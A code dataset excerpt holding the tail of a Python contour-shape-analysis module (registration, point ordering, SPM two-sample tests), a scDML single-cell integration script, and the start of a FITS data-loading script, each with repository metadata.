Results\\n')\n\t\t\tf.write('alpha = %.3f\\n' %self.alpha)\n\t\t\tf.write('T2_critical = %.3f\\n' %self.zc)\n\t\t\tf.write('p = %.3f\\n' %self.p)\n\t\t\tf.write('X0,Y0,X1,Y1,T2\\n')\n\t\t\tfor (x0,y0),(x1,y1),zz in zip(self.m0, self.m1, self.z):\n\t\t\t\tf.write('%.6f,%.6f,%.6f,%.6f,%.3f\\n' %(x0,y0,x1,y1,zz))\n\n\n\n@_process_mulitple_contours\n@_skip_template\ndef corresp_roll(r, r_template):\n\t'''\n\tFind contour point correspondence using a simple optimal roll search.\n\t\n\tNotes: \n\t\n\t* Below the variables (m,n) represent the number of shapes and number of contour points, respectively.\n\t* All shapes must have the same n.\n\t* Below the terms \"source\" and \"template\" refer to changing and non-changing contours, respectfully.\n\t\n\t\n\tInputs:\n\t\n\t* r : a single source contour as an (n,2) array or multiple source contours as an (m,n,2) array\n\t* r_template : the template contour as an (n,2) array\n\t\n\tOutputs:\n\t\n\t* Optimally rolled contour(s) with same array shape as r\n\t'''\n\tf = [sse(r_template, np.roll(r, i, axis=0) ) for i in range(r.shape[0])]\n\ti = np.argmin(f)\n\treturn np.roll(r, i, axis=0)\n\n\n\ndef get_repository_path():\n\t'''\n\tReturn the respoitory path relative to this file (lmfree2d.py).\n\t\n\tThe repository path is the parent of the directory in which this file is saved.\n\t'''\n\treturn unipath.Path( os.path.dirname(__file__) ).parent\n\n\n\ndef get_shape_with_most_points(r):\n\t'''\n\tReturn the contour shape that has the largest number of points.\n\t\n\tIf there are multiple shapes with the same (maximum) number of points, the first will be returned.\n\t\n\tInputs:\n\t\n\t*r* : multiple contour shapes as an (m,) array or m-length list of (n,2) contour shapes\n\t\n\tOutputs:\n\t\n\t* r_max : an (n,2) array, the element of r that has the most number of points\n\t* n_max : the number of points in r_max\n\t* ind : the index of r_max in r\n\t'''\n\tnpoints = [rr.shape[0] for rr in r]\n\tind = np.argmax(npoints)\n\treturn r[ind], max(npoints), ind\n\n\n\n@_process_mulitple_contours\ndef order_points_clockwise(r, clockwise=True):\n\t'''\n\tOrder a set of 2D points clockwise (default) or counterclockwise along the contour.\n\t\n\tNotes:\n\t\n\t* The points must be ordered before using this function.\n\t* This function will only check the CW/CCW point ordering, and reverse the ordering if necessary\n\t* See \"reorder_points\" for ordering a set of unordered points.\n\t\n\tInputs:\n\t\n\t* r : a single contour as an (n,2) array or multiple contours as an (m,) or (m,n,2) array\n\t* clockwise : bool True=clockwise, False=counterclockwise\n\t\n\tOutputs: \n\t\n\tr_ordered : contour(s) with ordered points, same array shape as r\n\n\tReferences:\n\t\n\t* https://stackoverflow.com/questions/1165647/how-to-determine-if-a-list-of-polygon-points-are-in-clockwise-order\n\t'''\n\tif np.all(r[0] == r[-1]):\n\t\tr = r[:-1]\n\n\tx,y = r.T\n\ts = (x[1:] - x[:-1]) * (y[1:] + y[:-1])\n\ts = s.sum() # s > 0 implies clockwise\n\t# print('Clockwise' if s else 'Counterclockwise')\n\tcw = s > 0\n\tif cw==clockwise:\n\t\tr = r[::-1]\n\treturn r\n\n\n\ndef plot_correspondence(ax, r1, r0, c0=None, c1=None, c2=None):\n\t'''\n\tPlot point correspondence between contour shapes.\n\t\n\tInputs:\n\t\n\t* ax : a Matplotlib axes object (e.g. use \"ax = pyplot.axes()\" to create an axes object)\n\t* r1 : one source contour shape as an (n,2) array, or multiple source contour shapes as an (m,) or (m,n,2) array\n\t* r0 : the template contour as an (n,2) array\n\t* c0 : color of template points\n\t* c1 : color of source points\n\t* c2 : color of correspondence lines\n\t'''\n\tdef _plot(ax, r0, r1, c0=None, c1=None, c2=None):\n\t\tc0 = 'k' if (c0 is None ) else c0\n\t\tc1 = colors[0] if (c1 is None ) else c1\n\t\tc2 = colors[2] if (c2 is None ) else c2\n\t\th0 = ax.plot(r0[:,0], r0[:,1], 'o', color=c0, ms=1, zorder=1)[0]\n\t\th1 = ax.plot(r1[:,0], r1[:,1], 'o', color=c1, ms=1, zorder=1)[0]\n\t\th2 = ax.plot(r0[0,0], r0[0,1], 'o', color=c0, mfc='w', mew=2, ms=8, zorder=3)[0]\n\t\th3 = ax.plot(r1[0,0], r1[0,1], 'o', color=c1, mfc='w', mew=2, ms=8, zorder=3)[0]\n\t\tfor (x0,y0),(x1,y1) in zip(r0,r1):\n\t\t\th4 = ax.plot([x0,x1], [y0,y1], '-', color=c2, lw=0.5, zorder=0)[0]\n\t\treturn h0,h1,h2,h3,h4\n\tif r1.ndim == 2:\n\t\th0,h1,h2,h3,h4 = _plot(ax, r1, r0, c0, c1, c2)\n\telse:\n\t\tx,y = np.meshgrid(1.2 + np.arange(5), [1.2,0])\n\t\tfor xx,yy,rr in zip(x.flatten(), y.flatten(), r1):\n\t\t\th0,h1,h2,h3,h4 = _plot(ax, rr+[xx,yy], r0+[xx,yy], c0, c1, c2)\n\tax.axis('equal')\n\tax.axis('off')\n\treturn h0,h1,h2,h3,h4\n\n\n\ndef plot_point_order(ax, r, cmap='jet'):\n\t'''\n\tPlot contour point order using a colormap to specify point order.\n\t\n\tInputs:\n\t\n\t* ax : a Matplotlib axes object (e.g. use \"ax = pyplot.axes()\" to create an axes object)\n\t* r : multiple contour shapes as an (m,) array or m-length list of (n,2) contour shapes\n\t* cmap : colormap name (see Matplotlib colormap documentation)\n\t\n\tReference:\n\t\n\thttps://matplotlib.org/3.1.0/tutorials/colors/colormaps.html\n\t'''\n\tdef _plot(r):\n\t\tax.scatter(r[:,0], r[:,1], c=np.arange(r.shape[0]), cmap=cmap)\n\tif r.ndim == 2:\n\t\t_plot(r)\n\telse:\n\t\tx,y = np.meshgrid( 1.2 * np.arange(5), [1.2,0])\n\t\tfor xx,yy,rr in zip(x.flatten(), y.flatten(), r):\n\t\t\t_plot( rr+[xx,yy] )\n\tax.axis('equal')\n\tax.axis('off')\n\n\n\ndef plot_registration(ax, r, r_template=None):\n\t'''\n\tPlot multiple shapes in an overlapping manner to check registration quality.\n\t\n\tInputs:\n\t\n\t* ax : a Matplotlib axes object (e.g. use \"ax = pyplot.axes()\" to create an axes object)\n\t* r : one contour shape as an (n,2) array, or multiple contour shapes as an (m,) or (m,n,2) array\n\t* r_template : the template contour as an (n,2) array\n\t'''\n\tif r.ndim == 2:\n\t\tr = [r]\n\th0 = [ax.plot(rr[:,0], rr[:,1], 'ko', lw=0.5, zorder=0, ms=2)[0] for rr in r][0]\n\tx,y = None, None\n\tif (r_template is None) and (r.ndim==3):\n\t\tx,y = r.mean(axis=0).T\n\t\tlabel = 'Mean'\n\telse:\n\t\tx,y = r_template.T\n\t\tlabel = 'Template'\n\tif x is not None:\n\t\th1 = ax.plot(x, y, 'ro', ms=8, zorder=1)[0]\n\t\tax.legend([h0,h1], ['Source', label])\n\tax.axis('equal')\n\tax.axis('off')\n\n\n\n@_process_mulitple_contours\ndef random_roll(r):\n\t'''\n\tRandomly roll contour points. Rolling a contour will change its starting point.\n\t\n\tInputs:\n\t\n\t* r : a single contour as an (n,2) array or multiple contours as an (m,) or (m,n,2) array\n\t\n\tOutputs: \n\t\n\tr_rolled : array of rolled contour points, same array shape as r\n\t'''\n\tn = r.shape[0] # number of points\n\ti = np.random.randint(1, n-1)\n\treturn np.roll(r, i, axis=0)\n\n\n\ndef read_csv(filename):\n\t'''\n\tRead contour shapes from a CSV file.\n\t\n\tNotes:\n\t\n\t* The CSV file should have one header row (e.g. column labels: Shape, X, Y)\n\t* Starting from the second row, the CSV file must have three columns:\n\t\t* Column 1 : integer label identifying a contour shape\n\t\t* Column 2 : X coordinate of contour point\n\t\t* Column 3 : Y coordinate of contour point\n\t* If all contour shapes have the same number of points (n), an (m,n,2) array will be returned, where m is the number of shapes\n\t* Otherwise an (m,) array will be returned, where each element is an (n,2) array\n\t\n\tInputs:\n\t\n\t* filename : full path to an output CSV file, formatted as described above\n\t\n\tOutputs:\n\t\n\t* r : multiple contours as an (m,) or (m,n,2) array\n\t'''\n\ta = np.loadtxt(filename, delimiter=',', skiprows=1)\n\tshape = np.asarray(a[:,0], dtype=int)\n\txy = np.array( a[:,1:] )\n\treturn np.array( [xy[shape==u] for u in np.unique(shape)] )\n\n\n\ndef read_csv_spm(filename):\n\t'''\n\tRead SPM results from a CSV file.\n\t\n\tNotes:\n\t\n\t* The CSV file is written from the output of \"two_sample_test\". For example:\n\t\n\t\t>>> results = two_sample_test(r0, r1)\n\t\t>>> results.write_csv( 'my_results.csv' )\n\t\n\tInputs:\n\t\n\t* filename : full path to a CSV file that contains results from \"two_sample_test\"\n\t\n\tOutputs:\n\t\n\t* results : TwoSampleSPMResults object (refer to the lmfree2d.TwoSampleSPMResults class definition)\n\t'''\n\twith open(filename, 'r') as f:\n\t\tlines = f.readlines()\n\talpha = float( lines[1].strip().split(' = ')[1] ) \n\tzc = float( lines[2].strip().split(' = ')[1] ) \n\tp = float( lines[3].strip().split(' = ')[1] ) \n\tA = np.array([s.strip().split(',') for s in lines[5:]], dtype=float)\n\tm0 = A[:,:2]\n\tm1 = A[:,2:4]\n\tz = A[:,4]\n\treturn TwoSampleSPMResults(m0, m1, z, alpha, zc, p)\n\n\n\ndef read_landmarks_csv(filename):\n\t'''\n\tRead landmarks from a CSV file.\n\t\n\tNotes:\n\t\n\t* The CSV file should have one header row (e.g. column labels: Shape, Landmark, X, Y)\n\t* Starting from the second row, the CSV file must have four columns:\n\t\t* Column 1 : integer label identifying a shape\n\t\t* Column 2 : integer label identifying a landmark\n\t\t* Column 3 : X landmark coordinate\n\t\t* Column 4 : Y landmark coordinate\n\t* All shapes must have the same number of landmarks\n\t\n\tInputs:\n\t\n\t* filename : full path to an output CSV file, formatted as described above\n\t\n\tOutputs:\n\t\n\t* landmarks : (m,n,2) array\n\t'''\n\ta = np.loadtxt(filename, delimiter=',', skiprows=1)\n\tshape = np.asarray(a[:,0], dtype=int)\n\txy = np.array( a[:,2:] )\n\treturn np.array( [xy[shape==u] for u in np.unique(shape)] )\n\n\n\n@_process_mulitple_contours\n@_skip_template\ndef register_cpd(r, r_template):\n\t'''\n\tRegister multiple contours using the Coherent Point Drift (CPD) algorithm.\n\t\n\tNotes: \n\t\n\t* Below the variables (m,n) represent the number of shapes and number of contour points, respectively.\n\t* Below the terms \"source\" and \"template\" refer to changing and non-changing contours, respectfully.\n\t* Source shapes do not necessarily have to have the same n.\n\t\n\t\n\tInputs:\n\t\n\t* r : a single source contour as an (n,2) array or multiple source contours as an (m,) or (m,n,2) array\n\t* r_template : the template contour as an (n,2) array\n\t\n\tOutputs:\n\t\n\t* r_reg : registered contour(s) with same array shape as r\n\t\n\tReferences:\n\t\n\t* https://github.com/siavashk/pycpd\n\t* https://siavashk.github.io/2017/05/14/coherent-point-drift/\n\t'''\n\treg = pycpd.RigidRegistration(X=r_template, Y=r)\n\treg.register()\n\tr_reg = reg.TY\n\treturn r_reg\n\n\n\n@_process_mulitple_contours\n@_skip_template\ndef register_procrustes(r, r_template):\n\t'''\n\tRegister multiple contours using a Procrustes fit.\n\t\n\tNotes: \n\t\n\t* Below the variables (m,n) represent the number of shapes and number of contour points, respectively.\n\t* Below the terms \"source\" and \"template\" refer to changing and non-changing contours, respectfully.\n\t* Contours do not necessarily have to have the same n.\n\t\n\t\n\tInputs:\n\t\n\t* r : a single source contour as an (n,2) array or multiple source contours as an (m,) or (m,n,2) array\n\t* r_template : the template contour as an (n,2) array\n\t\n\tOutputs:\n\t\n\t* r_reg : registered contour(s) with same array shape as r\n\t\n\tReferences:\n\t\n\thttps://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.procrustes.html\n\t'''\n\tc = r_template.mean(axis=0)\n\ts = np.linalg.norm( r_template - c ) # scale\n\t_,b,_ = scipy.spatial.procrustes(r_template, r)\n\tr1 = s * b + c\n\treturn r1\n\n\n\n@_process_mulitple_contours\ndef reorder_points(points, optimum_order=False, ensure_clockwise=True):\n\t'''\n\tOrder unordered points to form a continuous contour line\n\t\n\tNotes: \n\t\n\t* Below the variables (m,n) represent the number of shapes and number of contour points, respectively.\n\t* Below the terms \"source\" and \"template\" refer to changing and non-changing contours, respectfully.\n\t* Contours do not necessarily have to have the same n.\n\t\n\t\n\tInputs:\n\t\n\t* points : a single source contour as an (n,2) array or multiple source contours as an (m,) or (m,n,2) array\n\t* optimum_order : bool, whether or not to optimally order the points\n\t* ensure_clockwise : bool, whether or not to ensure that the points are ordered clockwise\n\t\n\tOutputs:\n\t\n\t* points_ordered : contour shape(s) with ordered points, same array shape as points\n\t\n\tReferences:\n\t\n\thttps://stackoverflow.com/questions/37742358/sorting-points-to-form-a-continuous-line\n\t\n\tAnother option:\n\t\n\txy = np.sort( xy.view('i8,i8'), order=['f1'], axis=0).view(np.float)\n\t\n\thttps://stackoverflow.com/questions/2828059/sorting-arrays-in-numpy-by-column\n\t\n\t'''\n\tpoints = np.asarray(points, dtype=float)\n\tclf = NearestNeighbors(n_neighbors=2, radius=0.05, algorithm='auto', leaf_size=4, metric='minkowski', p=4).fit(points)\n\tG = clf.kneighbors_graph()\n\tT = nx.from_scipy_sparse_matrix(G)\n\torder = list(nx.dfs_preorder_nodes(T, None, None))\n\tif optimum_order:\n\t\tnpoints = points.shape[0]\n\t\tpaths = [list(nx.dfs_preorder_nodes(T, i)) for i in range(npoints)]\n\t\tmindist = np.inf\n\t\tminidx = 0\n\t\tfor i in range( npoints ):\n\t\t\tp = paths[i] # order of nodes\n\t\t\tif len(p) < (0.5 * npoints):\n\t\t\t\tcontinue\n\t\t\tordered = points[p] # ordered nodes\n\t\t\t# find cost of that order by the sum of euclidean distances between points (i) and (i+1)\n\t\t\tcost = (((ordered[:-1] - ordered[1:])**2).sum(1)).sum()\n\t\t\tif cost < mindist:\n\t\t\t\tmindist = cost\n\t\t\t\tminidx = i\n\t\torder = paths[minidx]\n\tpoints = points[order]\n\tif ensure_clockwise:\n\t\tpoints = order_points_clockwise(points)\n\treturn points\n\n\n\n@_process_mulitple_contours\ndef set_npoints(r, n):\n\t'''\n\tSet the number of contour points.\n\t\n\tNotes: \n\t\n\t* The new contour points are calculated using NURBS interpolation.\n\t* The new contour points will be spaced equally from parametric position 0 to 1 around the contour.\n\t\n\t\n\tInputs:\n\t\n\t* r : a single source contour as an (n,2) array or multiple source contours as an (m,) or (m,n,2) array\n\t* n : int, desired number of contour points\n\t\n\tOutputs:\n\t\n\t* r_new : contour shape(s) with n points, as an (n,2) or (m,n,2) array\n\t\n\tReferences:\n\t\n\thttps://nurbs-python.readthedocs.io/en/latest/module_fitting.html\n\t'''\n\tpcurve = fitting.interpolate_curve(list(r), 3)\n\tpcurve.sample_size = n\n\treturn np.asarray( pcurve.evalpts )\n\n\n\ndef set_matplotlib_rcparams():\n\t'''\n\tSet rc paramameters for Matplotlib.\n\t\n\tThis function is needed only if you wish to replicate the paper's figures.\n\t\n\tReferences:\n\t\n\t* https://matplotlib.org/3.3.1/tutorials/introductory/customizing.html\n\t'''\n\tplt.rcParams['mathtext.fontset'] = 'stix'\n\tplt.rcParams['font.family'] = 'Arial'\n\tplt.rcParams['xtick.labelsize'] = 8\n\tplt.rcParams['ytick.labelsize'] = 8\n\n\n\n@_process_mulitple_contours\ndef shuffle_points(r):\n\t'''\n\tRandomly shuffle contour points.\n\t\n\tNotes:\n\t\n\t* Shuffled points are not ordered along the contour.\n\t* This function is useful for testing robustness to arbitrary point ordering.\n\t\n\tInputs:\n\t\n\t* r : a single contour as an (n,2) array or multiple contours as an (m,) or (m,n,2) array\n\t\n\tOutputs: \n\t\n\tr_shuffled : array of shuffled contour points, same array shape as r\n\t'''\n\tn = r.shape[0] # number of points\n\tind = np.random.permutation(n)\n\treturn r[ind]\n\n\n\ndef sse(r0, r1):\n\t'''\n\tCalculate pointwise sum-of-squared-error (SSE) between two contour shapes\n\t\n\tInputs:\n\t\n\t* r0 : a single contour as an (n,2) array\n\t* r1 : a single contour as an (n,2) array\n\t\n\tOutputs: \n\t\n\tsse_value : the sum-of-squared distances between contour points\n\t'''\n\treturn (np.linalg.norm(r1-r0, axis=1)**2).sum()\n\n\n\ndef two_sample_test(r0, r1, alpha=0.05, parametric=True, iterations=-1):\n\t'''\n\tConduct a two-sample test comparing two groups of contours.\n\t\n\tNotes:\n\t\n\t* This function conducts mass-multivariate statistical analysis using statistical parametric mapping (SPM)\n\t* The \"iterations\" keyword argument is used only if \"parametric\" is False\n\t* Setting \"iterations\" to -1 will conduct all possible permutations the data\n\t* As a rule-of-thumb, 10000 iterations is usually sufficient to achieve numerical stability\n\t* For small samples there may be less than 10000 unique permutations; in this case it is advisable to conduct all possible permutations\n\t\n\tInputs:\n\t\n\t* r0 : contours for one group as an (m,n,2) array\n\t* r1 : contours for a second group as an (m,n,2) array\n\t* alpha : float, Type I error rate (default: 0.05)\n\t* parametric : bool, whether to conduct parametric (True) or nonparametric (False) inference\n\t* iterations : int, number of iterations for nonparametric (permutation) inference; default: -1\n\t\n\tReferences:\n\t\n\t* Taylor, J. E., & Worsley, K. J. (2008). Random fields of multivariate test statistics, with applications to shape analysis. Annals of Statistics, 36(1), 1–27. http://doi.org/10.1214/009053607000000406)\n\t* Chung, M. K., Worsley, K. J., Nacewicz, B. M., Dalton, K. M., & Davidson, R. J. (2010). General multivariate linear modeling of surface shapes using SurfStat. NeuroImage, 53(2), 491–505. http://doi.org/10.1016/j.neuroimage.2010.06.032\n\t'''\n\tif parametric:\n\t\tspm = spm1d.stats.hotellings2(r0, r1).inference(alpha)\n\t\tz,zc = spm.z, spm.zstar\n\t\tp = spm1d.rft1d.T2.sf(z.max(), spm.df, spm.Q, spm.fwhm, withBonf=True)\n\telse:\n\t\tspm = spm1d.stats.nonparam.hotellings2(r0, r1).inference(alpha, iterations=iterations)\n\t\tz,zc = spm.z, spm.zstar\n\t\tpdf = spm.PDF0 # permutation distribution\n\t\tp = ( pdf >= z.max()).mean() # p value (percentage of values in pdf greater than or equal to T2max)\n\tm0,m1 = r0.mean(axis=0), r1.mean(axis=0)\n\treturn TwoSampleSPMResults(m0, m1, z, alpha, zc, p)\n\n\n\ndef write_csv(filename, r):\n\t'''\n\tWrite contour shapes as a CSV file\n\t\n\tInputs:\n\t\n\t* filename : full path to an output CSV file\n\t* r : multiple contours as an (m,) or (m,n,2) array\n\t'''\n\twith open(filename, 'w') as f:\n\t\tf.write('Shape,X,Y\\n')\n\t\tfor i,rr in enumerate(r):\n\t\t\tfor x,y in rr:\n\t\t\t\tf.write('%d,%.6f,%.6f\\n' %(i+1,x,y))", "repo_name": "0todd0000/lmfree2d", "sub_path": "Python/lmfree2d.py", "file_name": "lmfree2d.py", "file_ext": "py", "file_size_in_byte": 24774, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 182, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Axes", "line_number": 202, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "numpy.any", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Axes", "line_number": 234, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 298, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 300, "usage_type": "call"}, {"api_name": "unipath.Path", "line_number": 310, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 310, "usage_type": "call"}, {"api_name": "os.path", "line_number": 310, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 479, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 479, "usage_type": "attribute"}, {"api_name": "numpy.roll", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 506, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 507, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 508, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 537, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 567, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 569, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 570, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 570, "usage_type": "call"}, {"api_name": "pycpd.RigidRegistration", "line_number": 601, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 635, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 635, "usage_type": "attribute"}, {"api_name": "scipy.spatial.spatial.procrustes", "line_number": 636, "usage_type": "call"}, {"api_name": "scipy.spatial.spatial", "line_number": 636, "usage_type": "attribute"}, {"api_name": "scipy.spatial", "line_number": 636, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 675, "usage_type": "call"}, {"api_name": "sklearn.neighbors.NearestNeighbors", "line_number": 676, "usage_type": "call"}, {"api_name": "networkx.from_scipy_sparse_matrix", "line_number": 678, "usage_type": "call"}, {"api_name": "networkx.dfs_preorder_nodes", "line_number": 679, "usage_type": "call"}, {"api_name": "networkx.dfs_preorder_nodes", "line_number": 682, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 683, "usage_type": "attribute"}, {"api_name": "geomdl.fitting.interpolate_curve", "line_number": 727, "usage_type": "call"}, {"api_name": "geomdl.fitting", "line_number": 727, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 729, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 743, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 743, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 744, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 744, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 745, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 745, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 746, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 746, "usage_type": "name"}, {"api_name": "numpy.random.permutation", "line_number": 769, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 769, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 787, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 787, "usage_type": "attribute"}, {"api_name": "spm1d.stats.hotellings2", "line_number": 817, "usage_type": "call"}, {"api_name": "spm1d.stats", "line_number": 817, "usage_type": "attribute"}, {"api_name": "spm1d.rft1d.T2.sf", "line_number": 819, "usage_type": "call"}, {"api_name": "spm1d.rft1d", "line_number": 819, "usage_type": "attribute"}, {"api_name": "spm1d.stats.nonparam.hotellings2", "line_number": 821, "usage_type": "call"}, {"api_name": "spm1d.stats", "line_number": 821, "usage_type": "attribute"}]} +{"seq_id": "12124907588", "text": "import scanpy as sc \nimport matplotlib\nimport argparse\nmatplotlib.use(\"Agg\")\nfrom scDML import scDMLModel\n# import os \n# os.system(\"clear\")\n\nmethod=\"scDML\"\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset',type=str,required=True, help='dataset name')\nparser.add_argument(\"--filepath\",type=str,required=True,help=\"folder path of stored data\")\nparser.add_argument(\"--ncelltype\",type=int,required=True,help=\"number of celltype in dataset\")\nparser.add_argument(\"--K_in\",type=int,default=5,help=\"K value to calculate KNN pair\")\nparser.add_argument(\"--K_bw\",type=int,default=10,help=\"K value to calculate MNN pair\")\nparser.add_argument(\"--cluster_method\",type=str,default=\"louvain\",help=\"clustering algorithm to initize cluster label\")\nparser.add_argument(\"--resolution\",type=float,default=3.0,help=\"resolution of clustering algorithm\")\nparser.add_argument(\"--n_hvg\",type=int,default=1000,help=\"number of highly variable genes to be selected\")\nparser.add_argument(\"--verbose\",type=bool,default=True,help=\"print additional information\")\nparser.add_argument(\"--savedir\",type=str,required=True,help=\"where to save data\")\nparser.add_argument(\"--save\",type=bool,default=True,help=\"whether to save data\")\nprint(\"method=\",method)\nargs=parser.parse_args() \nprint(\"dataset=\",args.dataset)\ndataset=args.dataset\nfilepath=args.filepath\nncelltype=args.ncelltype\nK_in=args.K_in\nK_bw=args.K_bw\ncluster_method=args.cluster_method\nresolution=args.resolution\nn_hvg=args.n_hvg\nverbose=args.verbose\nsavedir=args.savedir\nsave=args.save\nsave_figdir=savedir\n\ndataset_path=filepath+\"/\"+dataset+\"_raw.h5ad\"# \nadata_raw=sc.read(dataset_path)\nsc.settings.figdir=save_figdir+dataset+\"/\"+method+\"/\"\n\nmethod=\"scDML\"\nscdml=scDMLModel(save_dir=save_figdir+dataset+\"/\"+method+\"/\")\n\nadata=scdml.preprocess(adata_raw,cluster_method=cluster_method,resolution=resolution,n_high_var=n_hvg)\n#print(adata)\nscdml.integrate(adata,batch_key=\"BATCH\",ncluster_list=[ncelltype],K_in=K_in,K_bw=K_bw,\n expect_num_cluster=ncelltype,merge_rule=\"rule2\")\nadata.obs[\"cluster_celltype\"]=adata.obs[\"reassign_cluster\"].copy()\n# visulization \n#####################################################\nsc.pp.neighbors(adata,random_state=0,use_rep=\"X_emb\")\nsc.tl.umap(adata)\n#####################################################\n\nsc.pl.umap(adata,color=[\"BATCH\",\"celltype\"],save=\"_\"+dataset+\"_\"+method+\"_corrected.png\")\nadata.write(savedir+dataset+\"/\"+method+\"/\"+dataset+\"_\"+method+\"_corrected.h5ad\")\n\n\n\n\n", "repo_name": "eleozzr/scDML_reproduce", "sub_path": "Method_script/scDML/scDML_script.py", "file_name": "scDML_script.py", "file_ext": "py", "file_size_in_byte": 2468, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.use", "line_number": 4, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "scanpy.read", "line_number": 39, "usage_type": "call"}, {"api_name": "scanpy.settings", "line_number": 40, "usage_type": "attribute"}, {"api_name": "scDML.scDMLModel", "line_number": 43, "usage_type": "call"}, {"api_name": "scanpy.pp.neighbors", "line_number": 52, "usage_type": "call"}, {"api_name": "scanpy.pp", "line_number": 52, "usage_type": "attribute"}, {"api_name": "scanpy.tl.umap", "line_number": 53, "usage_type": "call"}, {"api_name": "scanpy.tl", "line_number": 53, "usage_type": "attribute"}, {"api_name": "scanpy.pl.umap", "line_number": 56, "usage_type": "call"}, {"api_name": "scanpy.pl", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "73020786434", "text": "from astropy.io import ascii\nimport multiprocessing as mp\nimport numpy as np\nfrom os.path import isfile\nfrom typing import Callable\nfrom vip_hci.fits import open_fits, write_fits\n\nnumworkers = 8 # number of worker threads/processes\nnumcomps = 10 # number of PCA components\neverynthframe = 20 # number of frames 'n' selected from data cube\nchunksize = 20\npxscale = 0.035\n\ndef init(data_paths: list[str], wavelengths_path: str, angles_path: str, channels: list[int]=..., frames: list[int]=...) -> tuple[np.ndarray, np.ndarray, np.ndarray]:\n '''\n Get all data given the specified frames and channels to use.\n\n Returns a 4D data cube associated with all channels and frames, a list of\n angles that correspond to the frames, and a list of wavelengths that\n correspond to the channels.\n '''\n\n # >>>> figure out why angles are not the double precision as in the file\n\n # load data cube for each desired channel and frame as 4D cube\n cubes = loadall(data_paths)[:, frames].copy()\n\n # get list of wavelengths for proper calibration and scaling\n wavelengths = loadtbl(wavelengths_path, index=channels)\n\n # get list of angles for de-rotation\n angles = loadtbl(angles_path, index=frames)\n\n return cubes, wavelengths, angles\n\ndef loadtbl(path: str, index: list[int]=...) -> np.ndarray:\n table = ascii.read(path, format=\"no_header\", data_start=0)\n data = table[\"col1\"].data[index].copy()\n return data\n\n# >>>> add function to just open data instead of doing it w/in redux fn\ndef loadone(path: str, verbose: bool=False) -> np.ndarray:\n return open_fits(path, verbose=verbose)\n\ndef loadall(paths: list[str], verbose: bool=False) -> np.ndarray:\n with mp.Pool(numworkers) as pool:\n return np.array(pool.starmap(loadone, zip(paths, np.repeat([verbose], len(paths)))))\n\n# save numpy array to specified path as .FITS file\ndef to_fits(data: np.ndarray, path: str, overwrite: bool=True) -> None:\n if isfile(path) and overwrite or not isfile(path):\n write_fits(path, data)\n\n# save numpy array to specified path as .npy file\ndef to_npy(data: np.ndarray, path: str, overwrite: bool=True) -> None:\n if isfile(path) and overwrite or not isfile(path):\n np.save(path, data)\n\ndef 